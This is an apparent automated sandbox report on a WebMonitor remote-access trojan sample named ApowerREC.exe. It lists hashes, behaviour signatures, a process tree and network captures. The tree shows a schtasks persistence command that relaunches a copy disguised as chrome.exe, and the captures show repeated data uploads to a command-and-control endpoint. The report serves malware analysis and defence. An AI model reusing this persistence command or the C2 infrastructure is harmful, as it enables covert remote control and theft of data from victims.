Resubmissions

23/09/2021, 13:59 UTC

210923-ractvaefc5 8

22/08/2021, 12:44 UTC

210822-vqqzsf2ch6 10

Analysis

  • max time kernel
    301s
  • max time network
    305s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22/08/2021, 12:44 UTC

General

  • Target

    ApowerREC.exe

  • Size

    8.9MB

  • MD5

    810be064429970190268a24af354a2f1

  • SHA1

    f5e17599a9c30a9eada1dcb276b888bdeffd037d

  • SHA256

    7edf30b359be3f27c9e7313352bc2d4cccb0e36010b34633646ea4823a70a82b

  • SHA512

    d385f16cb89fff66926770768d34686963dededf2fe47cb3889fc1ab9ae791c9067b76d78d0f5b58f2a29d9bdb2e709a672d560c97cf34e1834230b322c157b0

Malware Config

Signatures

  • RevcodeRat, WebMonitorRat

    WebMonitor is a remote access tool that can be used from any browser to control and monitor phones or PCs.

  • WebMonitor Payload 1 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe
    "C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1968
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c
        2⤵
        PID:3384
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2⤵
        PID:212
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe'" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1140
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe'" /f
            3⤵
            • Creates scheduled task(s)
            PID:2356
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe" "C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe"
        2⤵
        PID:4048
  • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3264
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c
        2⤵
        PID:200
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2⤵
        PID:2732
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 1892
        2⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3412
  • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:512
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c
        2⤵
        PID:2172
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2⤵
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            -d 56007 TCP
            3⤵
            PID:1504
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            -a 10.10.0.30 56007 56007 TCP
            3⤵
            PID:2060
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            -d 56008 TCP
            3⤵
            PID:3800
          • C:\Users\Admin\AppData\Local\Temp\revpe.exe
            -d 56008 TCP
            3⤵
            • Executes dropped EXE
            PID:808
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            -a 10.10.0.30 56008 56008 TCP
            3⤵
            PID:3896
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1868
        2⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1348
  • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:3884
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c
        2⤵
        PID:3264
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 1868
        2⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1112

Network

  • DNS google.com
    Process: chrome.exe
    Remote address: 8.8.8.8:53
    Request
    google.com IN A
    Response
    google.com IN A 216.58.214.14
  • HEAD http://google.com/
    Process: ApowerREC.exe
    Remote address: 216.58.214.14:80
    Request
    HEAD / HTTP/1.1
    Host: google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Location: http://www.google.com/
    Content-Type: text/html; charset=UTF-8
    Date: Sun, 22 Aug 2021 12:45:05 GMT
    Expires: Tue, 21 Sep 2021 12:45:05 GMT
    Cache-Control: public, max-age=2592000
    Server: gws
    Content-Length: 219
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • HEAD http://www.google.com/
    Process: ApowerREC.exe
    Remote address: 172.217.19.196:80
    Request
    HEAD / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=ISO-8859-1
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Date: Sun, 22 Aug 2021 12:45:05 GMT
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Transfer-Encoding: chunked
    Expires: Sun, 22 Aug 2021 12:45:05 GMT
    Cache-Control: private
    Set-Cookie: NID=221=HzqJB51Xw0JOuEzGUMQuFB4QUGXreOqPWP4uQZbuFbqrEjkmyfHXvwE1VWAGjRkuCTL0ycNdiO3P4tmzQafFAf3YBbmsUKqSufLGYWBlhSmu8s2yTlx1hdOsFQos3ZXbCWtLPtjEG_vVYitlzQf1OuR0S7JmebYWXcLKRMy-gTQ; expires=Mon, 21-Feb-2022 12:45:05 GMT; path=/; domain=.google.com; HttpOnly
  • HEAD http://google.com/
    Process: chrome.exe
    Remote address: 216.58.214.14:80
    Request
    HEAD / HTTP/1.1
    Host: google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Location: http://www.google.com/
    Content-Type: text/html; charset=UTF-8
    Date: Sun, 22 Aug 2021 12:47:39 GMT
    Expires: Tue, 21 Sep 2021 12:47:39 GMT
    Cache-Control: public, max-age=2592000
    Server: gws
    Content-Length: 219
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • HEAD http://www.google.com/
    Process: chrome.exe
    Remote address: 172.217.19.196:80
    Request
    HEAD / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=ISO-8859-1
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Date: Sun, 22 Aug 2021 12:47:40 GMT
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Transfer-Encoding: chunked
    Expires: Sun, 22 Aug 2021 12:47:40 GMT
    Cache-Control: private
    Set-Cookie: NID=221=worHg1Xs_ENKEc9D77GwwOGchfZRx462xSQzwckGNRkIKIcbQPfwW3hnKpSWmsiI-Egy8P-IqnPCyScTpJJw-0ER2hTVE9VsYBDXfOAFTXzJXOIRkS062SPMUEeXMr-rdWuoGiN1X7H5W4CE_LoyTpp7QXHDXGnSZlZblvAtljU; expires=Mon, 21-Feb-2022 12:47:40 GMT; path=/; domain=.google.com; HttpOnly
  • HEAD http://google.com/
    Process: chrome.exe
    Remote address: 216.58.214.14:80
    Request
    HEAD / HTTP/1.1
    Host: google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Location: http://www.google.com/
    Content-Type: text/html; charset=UTF-8
    Date: Sun, 22 Aug 2021 12:48:38 GMT
    Expires: Tue, 21 Sep 2021 12:48:38 GMT
    Cache-Control: public, max-age=2592000
    Server: gws
    Content-Length: 219
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • HEAD http://www.google.com/
    Process: chrome.exe
    Remote address: 172.217.19.196:80
    Request
    HEAD / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=ISO-8859-1
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Date: Sun, 22 Aug 2021 12:48:38 GMT
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Transfer-Encoding: chunked
    Expires: Sun, 22 Aug 2021 12:48:38 GMT
    Cache-Control: private
    Set-Cookie: NID=221=rQJKe2vStoiLvz9rGz3o7co3Y8JHJo0lDs_HnTxhpxrIAcKBhoQZEEtrFFnLWlaSvBrBIPGrc4itctXjkLtPcPb6-lzJCpZWP7gTMGe2UuUhTXMZUA3W-G36mIuAROBKOTe5BnthTDVkU13qleqpqIECGuEgXhkbiKixeoRINK0; expires=Mon, 21-Feb-2022 12:48:38 GMT; path=/; domain=.google.com; HttpOnly
  • DNS sdns.se
    Process: AppLaunch.exe
    Remote address: 8.8.8.8:53
    Request
    sdns.se IN A
    Response
    sdns.se IN A 185.243.215.214
  • DNS ntp.se
    Process: AppLaunch.exe
    Remote address: 8.8.8.8:53
    Request
    ntp.se IN A
    Response
    ntp.se IN A 194.58.200.20
  • DNS 387d8b62b0aef501f4f4ebef23416753.se
    Process: AppLaunch.exe
    Remote address: 185.243.215.214:53
    Request
    387d8b62b0aef501f4f4ebef23416753.se IN A
  • DNS 387d8b62b0aef501f4f4ebef23416753.se
    Process: AppLaunch.exe
    Remote address: 1.2.4.8:53
    Request
    387d8b62b0aef501f4f4ebef23416753.se IN A
    Response
  • DNS 387d8b62b0aef501f4f4ebef23416753.se
    Process: AppLaunch.exe
    Remote address: 114.114.114.114:53
    Request
    387d8b62b0aef501f4f4ebef23416753.se IN A
    Response
  • DNS teamseed.wm01.to
    Process: AppLaunch.exe
    Remote address: 8.8.8.8:53
    Request
    teamseed.wm01.to IN A
    Response
    teamseed.wm01.to IN A 45.153.186.90
  • POST https://teamseed.wm01.to/recv8.php
    Process: AppLaunch.exe
    Remote address: 45.153.186.90:443
    Request
    POST /recv8.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: WM Client
    Host: teamseed.wm01.to
    Content-Length: 184
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 22 Aug 2021 12:49:19 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 3
    Connection: keep-alive
    Set-Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
  • POST https://teamseed.wm01.to/recv8.php
    Process: AppLaunch.exe
    Remote address: 45.153.186.90:443
    Request
    POST /recv8.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: WM Client
    Host: teamseed.wm01.to
    Content-Length: 295
    Cache-Control: no-cache
    Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 22 Aug 2021 12:49:20 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1
    Connection: keep-alive
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
  • POST https://teamseed.wm01.to/recv8.php
    Process: AppLaunch.exe
    Remote address: 45.153.186.90:443
    Request
    POST /recv8.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: WM Client
    Host: teamseed.wm01.to
    Content-Length: 207
    Cache-Control: no-cache
    Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 22 Aug 2021 12:49:20 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 200
    Connection: keep-alive
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Vary: Accept-Encoding
  • POST https://teamseed.wm01.to/recv8.php
    Process: AppLaunch.exe
    Remote address: 45.153.186.90:443
    Request
    POST /recv8.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: WM Client
    Host: teamseed.wm01.to
    Content-Length: 35133
    Cache-Control: no-cache
    Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 22 Aug 2021 12:49:20 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1
    Connection: keep-alive
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
  • POST https://teamseed.wm01.to/recv8.php
    Process: AppLaunch.exe
    Remote address: 45.153.186.90:443
    Request
    POST /recv8.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: WM Client
    Host: teamseed.wm01.to
    Content-Length: 165
    Cache-Control: no-cache
    Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 22 Aug 2021 12:49:20 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1
    Connection: keep-alive
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 157
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 207
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35393
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36325
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36549
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36049
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • GET
                          http://2.56.214.65/check.php?port1=56007
                          AppLaunch.exe
                          Remote address:
                          2.56.214.65:80
                          Request
                          GET /check.php?port1=56007 HTTP/1.1
                          Host: 2.56.214.65
                          Response
                          HTTP/1.1 200 OK
                          Date: Sun, 22 Aug 2021 12:49:34 GMT
                          Server: Apache/2.4.29 (Ubuntu)
                          Content-Length: 1
                          Content-Type: text/html; charset=UTF-8
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26493
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35217
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • HEAD
                          http://google.com/
                          chrome.exe
                          Remote address:
                          216.58.214.14:80
                          Request
                          HEAD / HTTP/1.1
                          Host: google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 301 Moved Permanently
                          Location: http://www.google.com/
                          Content-Type: text/html; charset=UTF-8
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Expires: Tue, 21 Sep 2021 12:49:38 GMT
                          Cache-Control: public, max-age=2592000
                          Server: gws
                          Content-Length: 219
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                        • HEAD
                          http://www.google.com/
                          chrome.exe
                          Remote address:
                          172.217.19.196:80
                          Request
                          HEAD / HTTP/1.1
                          Host: www.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: text/html; charset=ISO-8859-1
                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                          Date: Sun, 22 Aug 2021 12:49:38 GMT
                          Server: gws
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Transfer-Encoding: chunked
                          Expires: Sun, 22 Aug 2021 12:49:38 GMT
                          Cache-Control: private
                          Set-Cookie: NID=221=Pv-JU3HMQZH0YmZD2f9hTJHow_Mr2PJ6axXLp3bvsrKi8KSwabm0puhFTwttyRmzL9gvrdLCavwI3zzWLwrBDQrwGc0ttgNp3XAsb-mZYEELHK1bxbikALKvFs3W5kU1WTsq8FpgF4fdmvapusU57XPsVZn4lmygvt7LhBUhx1w; expires=Mon, 21-Feb-2022 12:49:38 GMT; path=/; domain=.google.com; HttpOnly
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
